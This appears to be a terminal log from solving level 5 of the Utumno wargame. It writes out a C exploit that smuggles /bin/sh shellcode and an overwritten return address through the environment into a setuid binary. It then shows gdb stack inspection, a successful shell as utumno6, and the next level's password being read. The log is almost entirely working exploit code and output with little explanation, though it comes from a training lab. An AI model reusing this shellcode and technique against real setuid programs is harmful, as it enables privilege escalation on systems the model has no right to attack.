root@today:~/Desktop/misc/utumno/utumno5# ssh [email protected]
[email protected]'s password: woucaejiek
utumno5@melinda:~$ mkdir /tmp/utu5
utumno5@melinda:~$ cd /tmp/utu5
utumno5@melinda:/tmp/utu5$ cat hacker.c #include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
char *arg[] = {0x00};
char *envp[] = {
"",
"",
"",
"",
"",
"",
"",
"",
"\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80",
"UUUUUUUUUUUUUUUU\xba\xdf\xff\xff",
NULL
};
execve("/utumno/utumno5", arg, envp);
perror("execve");
exit(1);
}utumno5@melinda:/tmp/utu5$ gcc hacker.c -o hacker -m32 -g
utumno5@melinda:/tmp/utu5$ gdb -tui hacker
(gdb) b *main
Breakpoint 1 at 0x804847d: file hacker.c, line 6.
(gdb) run
Starting program: /tmp/utu5/hacker
Breakpoint 1, main (argc=1, argv=0xffffd684) at hacker.c:6
(gdb) c
Continuing.
process 23083 is executing new program: /games/utumno/utumno5
Breakpoint 1, main (argc=0, argv=0xffffdec4) at utumno5.c:38
(gdb) ni
(gdb) ni
(gdb) x/24dbx $ebp
0xffffde28: 0x00 0x00 0x00 0x00 0x63 0xda 0xe3 0xf7
0xffffde30: 0x00 0x00 0x00 0x00 0xc4 0xde 0xff 0xff
0xffffde38: 0xc8 0xde 0xff 0xff 0xea 0xac 0xfe 0xf7#0x0c(%ebp) = 0xffffdec4
(gdb) x/48dbx 0xffffdec4
0xffffdec4: 0x00 0x00 0x00 0x00 0xb2 0xdf 0xff 0xff
0xffffdecc: 0xb3 0xdf 0xff 0xff 0xb4 0xdf 0xff 0xff
0xffffded4: 0xb5 0xdf 0xff 0xff 0xb6 0xdf 0xff 0xff
0xffffdedc: 0xb7 0xdf 0xff 0xff 0xb8 0xdf 0xff 0xff
0xffffdee4: 0xb9 0xdf 0xff 0xff 0xba 0xdf 0xff 0xff
0xffffdeec: 0xd3 0xdf 0xff 0xff 0x00 0x00 0x00 0x00
(gdb) x/24dbx 0xffffdfba
0xffffdfba: 0x6a 0x0b 0x58 0x31 0xf6 0x56 0x68 0x2f
0xffffdfc2: 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e
0xffffdfca: 0x89 0xe3 0x31 0xc9 0x89 0xca 0xcd 0x80
(gdb) x/24dbx 0xffffdfd3
0xffffdfd3: 0x55 0x55 0x55 0x55 0x55 0x55 0x55 0x55
0xffffdfdb: 0x55 0x55 0x55 0x55 0x55 0x55 0x55 0x55
0xffffdfe3: 0xba 0xdf 0xff 0xff 0x00 0x2f 0x75 0x74utumno5@melinda:/tmp/utu5$ ./hacker
Here we go - UUUUUUUUUUUUUUUU錕斤拷錕斤拷
$ whoami
utumno6
$ cat /etc/utumno_pass/utumno6
eiluquieth
$